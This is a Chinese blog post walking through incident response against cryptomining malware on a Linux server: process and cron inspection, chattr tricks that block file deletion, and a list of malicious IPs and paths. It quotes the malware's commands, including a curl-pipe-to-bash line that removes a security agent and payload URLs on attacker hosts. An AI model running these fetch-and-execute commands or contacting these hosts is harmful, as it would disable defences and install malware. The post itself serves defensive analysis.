2024年最全安全应急:解决无法删除挖矿病毒-bash和sysdrr等文件_应急dw(1),图文详解

写在最后

在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。

需要完整版PDF学习资源私我

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

一次安全应急过程,发现大量的恶意脚本和挖矿文件包括-bash和sysdrr等明显特征病毒家族的文件,然后发现竟然删除不了恶意文件,提示“Operation not permitted” 不允许操作。此情此景,只好掏出祖传的安全应急手册,终于找到破解之法。

一、 top 命令查看进程

通过top查看,发现有一个-bash进程消耗了大量的CPU资源。

二、查看网络连接

通过netstat -anltp查看,发现两个异常进程bashirc和-bash。

尝试使用 kill -9+ 进程号,强制杀死进程后,病毒进程又重启,怀疑设置了定时任务

三、查询不到-bash文件

查看PID目录/proc/31766,可以看到exe被指向了一个被删除了的-bash进程(进程路径/usr/bin/-bash)

ls /proc/31766/ -lh

查看PID目录/proc/28552,可以看到exe被指向了一个/tmp/-python

ls /proc/28552/ -lh

可以查到恶意进程bashirc

ps -ef | grep bashirc

Look look这个bashirc和-python在干啥,在下载恶意代码的文件和调用masscan扫描内网:

看看http://5.42.67.3/2.gif、http://dw.c4kdeliver.top/2.gif是下载个啥:

这时给目录赋权、修改文件属性防止被删除、还套娃下载quartz_uninstall.sh内容如下:

curl http://update.aegis.aliyun.com/download/quartz_uninstall.sh|bash

四、查看定时任务

列出所有的定时任务,又是套娃下载,由于主机已禁用了复制、上传、下载,因此也不能分析这个base64编码的内容了。

crontab -l

五、查看启动项

1)基本上所有sep时间的文件都是被篡改过或投放进来的:

ls /etc/init.d -lh

又是套娃下载:

vi /etc/init.d/linux-d

​2)找不到-bash的原因

vi /etc/init.d/pwnring

上面的脚本将/bin/initdr拷贝到/bin/-bash,执行他后删除,并且所有的操作都将操作记录写给了null,隐藏了他在系统内的踪迹,更加确定了我的想法,绝壁是被当矿机了。我们用vim打开这个sysdrr文件,发现里面全是乱码,说明这还不是一个简单的文本脚本文件。

六、grep -r搜索包含特定字符的文件

grep -r 命令的使用也比较简单,只需在命令行中输入grep -r 后面加上要搜索的字符就可以完成搜索,例如:grep -r ‘hello’ 就可以搜索文件中包含hello字符的文件。搜索当前目录中所有文件中的字符串:grep -r ‘keyword’ .

使用grep -r****查询包含恶意域名的文件:

grep -r “dw.c4kdeliver.top” /

七、无法删除文件

1)无法删除启动项中恶意文件

chattr -ia 清除文件属性获取操作权限

使用rm -rf 无法删除文件,提示“Operation not permitted” 不允许操作。

2)lsattr查看文件属性不被修改

属性i     #无法对文件进行修改;若对目录设置了该参数,则仅能修改其中的子文件内容而不能新建或删除文件

属性a       #仅允许补充(追加)内容,无法覆盖/删除内容(Append Only)

**如果需要删除文件,需要解除ia****属性,**即可删除:

chattr -ia -python

rm -f -python

八、后续建议

1)封堵恶意IP和域名

封禁恶意ip和域名,包括恶意域名dw.c4kdeliver.top,恶意IP包括:104.21.22.218,172.67.207.34,5.42.67.3,87.121.221.176,89.185.85.102,167.71.233.11,51.255.171.23,172.64.80.1,104.21.22.218,217.182.205.238

2)杀死恶意进程

需要杀死恶意进程,不然文件删除可能还会出行。

kill -pid

3)清除定时任务

执行以下命令后,所有用户下面的定时任务会被删除,所以需要注意是不是要全部清除:

crontab -r

4)清除可疑文件

整理一些可疑文件和目录,自行确认是否正常,对于攻击者投放的文件建议全部清除,当然要想把恶意文件全部找出来,可能需要花不少时间,建议找出攻击路径和问题原因后,重置操作系统吧。

5)可疑的文件和存放的目录:

/etc/ld.so.preload

/etc/rc.local/.bash_profilr

/etc/rc.local/.bashrc

/etc/systemd/system/

/etc/systemd/system/linux-d.service

/etc/systemd/system/pwringe.service

/etc/init.d/pwnrig

/etc/init.d/sedWxsep5

/etc/init.d/oanacroner

/etc/cron.d/apache

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值